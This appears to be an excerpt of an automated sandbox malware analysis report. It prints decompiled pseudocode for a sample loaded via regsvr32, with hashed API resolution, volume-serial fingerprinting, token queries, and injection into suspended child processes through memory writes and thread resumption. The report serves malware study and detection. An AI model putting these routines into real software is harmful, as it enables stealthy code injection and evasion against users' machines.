                                                                                                                                                                                              • Instruction ID: bbc3cfa5108f8549cf2dcbf1d47d9f0cd759e6c53a27b8fe187dd255eec05d21
                                                                                                                                                                                              • Opcode Fuzzy Hash: ee1264b1b0c3e8883b41cd6f924000ace11d30aaeb2146518674763d47a4b619
                                                                                                                                                                                              • Instruction Fuzzy Hash: B7118E726043016BC710DAACE849E9A7BECFF85360F140A39F565C7180EB25E90587A6
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499EEBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 190 499eebb-499eed2 191 499ef2f 190->191 192 499eed4-499eefc 190->192 194 499ef31-499ef35 191->194 192->191 193 499eefe-499ef21 call 499a43d call 499e2c5 192->193 199 499ef23-499ef2d 193->199 200 499ef36-499ef4d 193->200 199->191 199->193 201 499ef4f-499ef57 200->201 202 499efa3-499efa5 200->202 201->202 203 499ef59 201->203 202->194 204 499ef5b-499ef61 203->204 205 499ef71-499ef82 204->205 206 499ef63-499ef65 204->206 207 499ef84-499ef85 205->207 208 499ef87-499ef93 LoadLibraryA 205->208 206->205 209 499ef67-499ef6f 206->209 207->208 208->191 210 499ef95-499ef9f GetProcAddress 208->210 209->204 209->205 210->191 211 499efa1 210->211 211->194
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0499EEBB(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0499E2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0499A43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                                                                                                                                                                                              0x0499eec4
                                                                                                                                                                                              0x0499eec6
                                                                                                                                                                                              0x0499eec9
                                                                                                                                                                                              0x0499eecc
                                                                                                                                                                                              0x0499eed2
                                                                                                                                                                                              0x0499ef2f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ef2f
                                                                                                                                                                                              0x0499eed4
                                                                                                                                                                                              0x0499eedf
                                                                                                                                                                                              0x0499eee2
                                                                                                                                                                                              0x0499eee7
                                                                                                                                                                                              0x0499eeec
                                                                                                                                                                                              0x0499eeef
                                                                                                                                                                                              0x0499eef1
                                                                                                                                                                                              0x0499eef4
                                                                                                                                                                                              0x0499eef7
                                                                                                                                                                                              0x0499eefc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499eefe
                                                                                                                                                                                              0x0499eefe
                                                                                                                                                                                              0x0499ef10
                                                                                                                                                                                              0x0499ef1d
                                                                                                                                                                                              0x0499ef21
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ef23
                                                                                                                                                                                              0x0499ef26
                                                                                                                                                                                              0x0499ef27
                                                                                                                                                                                              0x0499ef2d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ef2d
                                                                                                                                                                                              0x0499ef44
                                                                                                                                                                                              0x0499ef49
                                                                                                                                                                                              0x0499ef4d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ef59
                                                                                                                                                                                              0x0499ef59
                                                                                                                                                                                              0x0499ef5b
                                                                                                                                                                                              0x0499ef5b
                                                                                                                                                                                              0x0499ef61
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ef67
                                                                                                                                                                                              0x0499ef6b
                                                                                                                                                                                              0x0499ef6f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ef6f
                                                                                                                                                                                              0x0499ef75
                                                                                                                                                                                              0x0499ef7d
                                                                                                                                                                                              0x0499ef82
                                                                                                                                                                                              0x0499ef85
                                                                                                                                                                                              0x0499ef85
                                                                                                                                                                                              0x0499ef87
                                                                                                                                                                                              0x0499ef8b
                                                                                                                                                                                              0x0499ef93
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ef97
                                                                                                                                                                                              0x0499ef9f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ef9f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 0499EF8B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0499EF97
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: .dll
                                                                                                                                                                                              • API String ID: 2574300362-2738580789
                                                                                                                                                                                              • Opcode ID: 76e81e4b8e2bd1b57bcd5c9b0b8f9c779a5c4e20c6e10e96e63e9ea6e009c7bf
                                                                                                                                                                                              • Instruction ID: 0477b5758ccad1e38f68d864b11bef4ec2d1aa7dc817fe527a3bf3d8f537acbe
                                                                                                                                                                                              • Opcode Fuzzy Hash: 76e81e4b8e2bd1b57bcd5c9b0b8f9c779a5c4e20c6e10e96e63e9ea6e009c7bf
                                                                                                                                                                                              • Instruction Fuzzy Hash: A7319271A001559BCF25CF6DC8846AEBBE9EF44344F28447AD845E7391E730FD518B90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499C5EC Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                              			E0499C5EC(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E04998D6D(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x49af818; // 0x4bdf8b0
				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E04999DF2(_t44, 0xad6);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E04998BAF( &_v16);
				_t33 = E0499A456(_t43);
				E04999E51( &(_t43[E0499A456(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0499A456(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0499E2C5(_t43, E0499A456(_t43) + _t40, 0);
			}
















                                                                                                                                                                                              0x0499c5ec
                                                                                                                                                                                              0x0499c5f5
                                                                                                                                                                                              0x0499c601
                                                                                                                                                                                              0x0499c607
                                                                                                                                                                                              0x0499c609
                                                                                                                                                                                              0x0499c611
                                                                                                                                                                                              0x0499c61f
                                                                                                                                                                                              0x0499c624
                                                                                                                                                                                              0x0499c633
                                                                                                                                                                                              0x0499c63e
                                                                                                                                                                                              0x0499c64b
                                                                                                                                                                                              0x0499c665
                                                                                                                                                                                              0x0499c66a
                                                                                                                                                                                              0x0499c66c
                                                                                                                                                                                              0x0499c673
                                                                                                                                                                                              0x0499c683
                                                                                                                                                                                              0x0499c694
                                                                                                                                                                                              0x0499c69e
                                                                                                                                                                                              0x0499c6a6
                                                                                                                                                                                              0x0499c6ad
                                                                                                                                                                                              0x0499c6b0
                                                                                                                                                                                              0x0499c6cd

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04998D6D: memset.MSVCRT ref: 04998D7F
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000100), ref: 0499C633
                                                                                                                                                                                              • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0499C665
                                                                                                                                                                                                • Part of subcall function 04999E51: _vsnwprintf.MSVCRT ref: 04999E6E
                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00000114), ref: 0499C69E
                                                                                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0499C6B0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 455400327-0
                                                                                                                                                                                              • Opcode ID: cbaac0a55bd57eca5d29e50aa8eaad8b1911e6fc464c6ea4f0dc6d9acdf7e29e
                                                                                                                                                                                              • Instruction ID: edaa63d1a57127ceac871258f20f5e67f0aa0cd4ac2496ae63e123c86b6d0b54
                                                                                                                                                                                              • Opcode Fuzzy Hash: cbaac0a55bd57eca5d29e50aa8eaad8b1911e6fc464c6ea4f0dc6d9acdf7e29e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 022149B2D00214BFEB14ABA8DC49FEE77FCEF85214F144575F505D6180EA74AE448BA4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499C7F5 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 212 499c7f5-499c815 GetTokenInformation 213 499c85b 212->213 214 499c817-499c820 GetLastError 212->214 215 499c85d-499c861 213->215 214->213 216 499c822-499c832 call 4998bde 214->216 219 499c838-499c84b GetTokenInformation 216->219 220 499c834-499c836 216->220 219->213 221 499c84d-499c859 call 4998bf4 219->221 220->215 221->220
                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                              			E0499C7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E04998BDE(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E04998BF4( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                                                                                                                                                                                              0x0499c7f8
                                                                                                                                                                                              0x0499c7f9
                                                                                                                                                                                              0x0499c800
                                                                                                                                                                                              0x0499c808
                                                                                                                                                                                              0x0499c80c
                                                                                                                                                                                              0x0499c815
                                                                                                                                                                                              0x0499c85b
                                                                                                                                                                                              0x0499c85b
                                                                                                                                                                                              0x0499c822
                                                                                                                                                                                              0x0499c82a
                                                                                                                                                                                              0x0499c82c
                                                                                                                                                                                              0x0499c832
                                                                                                                                                                                              0x0499c84b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499c84d
                                                                                                                                                                                              0x0499c852
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499c858
                                                                                                                                                                                              0x0499c834
                                                                                                                                                                                              0x0499c834
                                                                                                                                                                                              0x0499c834
                                                                                                                                                                                              0x0499c834
                                                                                                                                                                                              0x0499c832
                                                                                                                                                                                              0x0499c861

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04990000,00000000,00000000,?,0499C876,00000000,00000000,?,0499C89F), ref: 0499C810
                                                                                                                                                                                              • GetLastError.KERNEL32(?,0499C876,00000000,00000000,?,0499C89F,00001644,?,0499DFCE), ref: 0499C817
                                                                                                                                                                                                • Part of subcall function 04998BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0499959D,00000100,?,04996507), ref: 04998BEC
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0499C876,00000000,00000000,?,0499C89F,00001644,?,0499DFCE), ref: 0499C846
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2499131667-0
                                                                                                                                                                                              • Opcode ID: c765af53ddf6c1454c118cd7a9755e29db778580e887eaf79361c1462fc192ec
                                                                                                                                                                                              • Instruction ID: 458921224b0aec2486a6d12120090741799266f3eb864d62bb6a37019a1e7378
                                                                                                                                                                                              • Opcode Fuzzy Hash: c765af53ddf6c1454c118cd7a9755e29db778580e887eaf79361c1462fc192ec
                                                                                                                                                                                              • Instruction Fuzzy Hash: AC0144B2B00114BFAF20AAAEDC48DAB7FFCEF456A07110579F505E6110E670FD0096E0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499BC84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40processCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 224 499bc84-499bcd3 call 4998d6d * 2 CreateProcessW
                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E0499BC84(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E04998D6D(__edx, 0, 0x10);
				E04998D6D( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}





                                                                                                                                                                                              0x0499bc95
                                                                                                                                                                                              0x0499bca2
                                                                                                                                                                                              0x0499bcaa
                                                                                                                                                                                              0x0499bcc6
                                                                                                                                                                                              0x0499bccc
                                                                                                                                                                                              0x0499bcd3

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04998D6D: memset.MSVCRT ref: 04998D7F
                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0499BCC6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateProcessmemset
                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                              • API String ID: 2296119082-2746444292
                                                                                                                                                                                              • Opcode ID: 642ef2f7ee60f388ae4639bacdbbd0a830d641105817a14afc9ff1576b7ad41c
                                                                                                                                                                                              • Instruction ID: cc7dd8c2ad6aa4a3b98594c4de32f779e9e5cdbfe0fb6faf1c220c8185f62317
                                                                                                                                                                                              • Opcode Fuzzy Hash: 642ef2f7ee60f388ae4639bacdbbd0a830d641105817a14afc9ff1576b7ad41c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BF065F16402087EFB20E669DC0AFBF7AECDB81714F500135BB05EB1C0E6A4AD0582B5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499D804 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 229 499d804-499d824 call 499d6dc 232 499d82a-499d849 call 499b557 229->232 233 499d955-499d958 229->233 236 499d84f-499d851 232->236 237 499d945-499d954 call 4998bf4 232->237 239 499d933-499d943 call 4998bf4 236->239 240 499d857-499d859 236->240 237->233 239->237 242 499d85c-499d85e 240->242 245 499d921-499d92d 242->245 246 499d864-499d883 call 4998d6d call 499bc84 242->246 245->236 245->239 251 499d8e5-499d8e9 246->251 252 499d885-499d898 call 499d959 246->252 253 499d8eb-499d8ed 251->253 254 499d914-499d91b 251->254 252->251 259 499d89a-499d8b2 252->259 256 499d8ef-499d8f5 253->256 257 499d8fe-499d90e 253->257 254->242 254->245 256->257 257->254 262 499d8e2 259->262 263 499d8b4-499d8c9 GetLastError call 499da57 259->263 262->251 266 499d8cb-499d8d6 263->266 267 499d8de-499d8df FindCloseChangeNotification 263->267 269 499d8d9 266->269 270 499d8d8 266->270 267->262 269->267 270->269
                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                              			E0499D804(intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				signed int _t45;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t63;
				signed int _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t86;
				char _t87;
				void* _t88;

				_v16 = _v16 & 0x00000000;
				_v20 = __edx;
				_t86 = 0;
				_t37 = E0499D6DC( &_v16);
				_t87 = _t37;
				_v24 = _t87;
				_t89 = _t87;
				if(_t87 == 0) {
					return _t37;
				}
				_t38 =  *0x49af81c; // 0x4bdfbe8
				_t7 = _t38 + 0xac; // 0x1d290ddf
				E0499B557( &_v80,  *_t7 + 7, _t89);
				_v12 = _v12 & 0;
				_t67 = _v16;
				if(_t67 == 0) {
					L21:
					E04998BF4( &_v24, 0);
					return _t86;
				}
				while(_t86 == 0) {
					_t69 = 0;
					_v8 = 0;
					while(_t86 == 0) {
						E04998D6D( &_v40, _t86, 0x10);
						_t88 = _t88 + 0xc;
						_t49 = E0499BC84( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
						_t94 = _t49;
						if(_t49 >= 0) {
							_t56 = E0499D959(E049961C5,  &_v40, _t94, _v20); // executed
							if(_t56 != 0) {
								_t59 =  *0x49af818; // 0x4bdf8b0
								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
								if(_t70 != 0) {
									GetLastError();
									_t62 = E0499DA57( &_v40);
									_t63 =  *0x49af818; // 0x4bdf8b0
									if(_t62 != 0) {
										_push(0xea60);
										_push(_t70);
										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
											_t86 = _t86 + 1;
										}
										_t63 =  *0x49af818; // 0x4bdf8b0
									}
									FindCloseChangeNotification(_t70);
								}
								_t69 = _v8;
							}
						}
						if(_v40 != 0) {
							if(_t86 == 0) {
								_t54 =  *0x49af818; // 0x4bdf8b0
								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
							}
							_t50 =  *0x49af818; // 0x4bdf8b0
							 *((intOrPtr*)(_t50 + 0x30))(_v36);
							_t52 =  *0x49af818; // 0x4bdf8b0
							 *((intOrPtr*)(_t52 + 0x30))(_v40);
						}
						_t69 = _t69 + 1;
						_v8 = _t69;
						if(_t69 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t67 = _v16;
					_t45 = _v12 + 1;
					_v12 = _t45;
					if(_t45 < _t67) {
						continue;
					} else {
						break;
					}
					do {
						goto L20;
					} while (_t67 != 0);
					goto L21;
				}
				L20:
				E04998BF4(_t87, 0xfffffffe);
				_t87 = _t87 + 4;
				_t67 = _t67 - 1;
			}




























                                                                                                                                                                                              0x0499d80a
                                                                                                                                                                                              0x0499d813
                                                                                                                                                                                              0x0499d816
                                                                                                                                                                                              0x0499d818
                                                                                                                                                                                              0x0499d81d
                                                                                                                                                                                              0x0499d81f
                                                                                                                                                                                              0x0499d822
                                                                                                                                                                                              0x0499d824
                                                                                                                                                                                              0x0499d958
                                                                                                                                                                                              0x0499d958
                                                                                                                                                                                              0x0499d82a
                                                                                                                                                                                              0x0499d833
                                                                                                                                                                                              0x0499d83c
                                                                                                                                                                                              0x0499d841
                                                                                                                                                                                              0x0499d844
                                                                                                                                                                                              0x0499d849
                                                                                                                                                                                              0x0499d945
                                                                                                                                                                                              0x0499d94b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499d954
                                                                                                                                                                                              0x0499d84f
                                                                                                                                                                                              0x0499d857
                                                                                                                                                                                              0x0499d859
                                                                                                                                                                                              0x0499d85c
                                                                                                                                                                                              0x0499d86b
                                                                                                                                                                                              0x0499d876
                                                                                                                                                                                              0x0499d87c
                                                                                                                                                                                              0x0499d881
                                                                                                                                                                                              0x0499d883
                                                                                                                                                                                              0x0499d890
                                                                                                                                                                                              0x0499d898
                                                                                                                                                                                              0x0499d8a3
                                                                                                                                                                                              0x0499d8ae
                                                                                                                                                                                              0x0499d8b2
                                                                                                                                                                                              0x0499d8b4
                                                                                                                                                                                              0x0499d8bd
                                                                                                                                                                                              0x0499d8c4
                                                                                                                                                                                              0x0499d8c9
                                                                                                                                                                                              0x0499d8cb
                                                                                                                                                                                              0x0499d8d0
                                                                                                                                                                                              0x0499d8d6
                                                                                                                                                                                              0x0499d8d8
                                                                                                                                                                                              0x0499d8d8
                                                                                                                                                                                              0x0499d8d9
                                                                                                                                                                                              0x0499d8d9
                                                                                                                                                                                              0x0499d8df
                                                                                                                                                                                              0x0499d8df
                                                                                                                                                                                              0x0499d8e2
                                                                                                                                                                                              0x0499d8e2
                                                                                                                                                                                              0x0499d898
                                                                                                                                                                                              0x0499d8e9
                                                                                                                                                                                              0x0499d8ed
                                                                                                                                                                                              0x0499d8ef
                                                                                                                                                                                              0x0499d8f8
                                                                                                                                                                                              0x0499d8f8
                                                                                                                                                                                              0x0499d8fe
                                                                                                                                                                                              0x0499d906
                                                                                                                                                                                              0x0499d909
                                                                                                                                                                                              0x0499d911
                                                                                                                                                                                              0x0499d911
                                                                                                                                                                                              0x0499d914
                                                                                                                                                                                              0x0499d915
                                                                                                                                                                                              0x0499d91b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499d91b
                                                                                                                                                                                              0x0499d924
                                                                                                                                                                                              0x0499d927
                                                                                                                                                                                              0x0499d928
                                                                                                                                                                                              0x0499d92d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499d933
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499d933
                                                                                                                                                                                              0x0499d933
                                                                                                                                                                                              0x0499d936
                                                                                                                                                                                              0x0499d93c
                                                                                                                                                                                              0x0499d940

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04998D6D: memset.MSVCRT ref: 04998D7F
                                                                                                                                                                                                • Part of subcall function 0499BC84: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0499BCC6
                                                                                                                                                                                                • Part of subcall function 0499D959: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0499D9BB
                                                                                                                                                                                                • Part of subcall function 0499D959: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0499DA04
                                                                                                                                                                                                • Part of subcall function 0499D959: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0499DA21
                                                                                                                                                                                                • Part of subcall function 0499D959: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0499DA42
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000001), ref: 0499D8B4
                                                                                                                                                                                                • Part of subcall function 0499DA57: ResumeThread.KERNELBASE(?,0499D8C2,?,?,00000001), ref: 0499DA5F
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 0499D8DF
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2212882986-0
                                                                                                                                                                                              • Opcode ID: 678b2a7d636721d29be5dadb2f9b58dfa251569098174b71b3b3d6d27edabf6a
                                                                                                                                                                                              • Instruction ID: ea5ff85795a01fa9ff47c5c8424a35b8df25553dd38ec4e460e316d1d130ebf4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 678b2a7d636721d29be5dadb2f9b58dfa251569098174b71b3b3d6d27edabf6a
                                                                                                                                                                                              • Instruction Fuzzy Hash: CB415C71A00209AFDF10EF9DD9C4AAEB7F9EF88314F104279E905A7251DB30AD418B60
                                                                                                                                                                                              Uniqueness
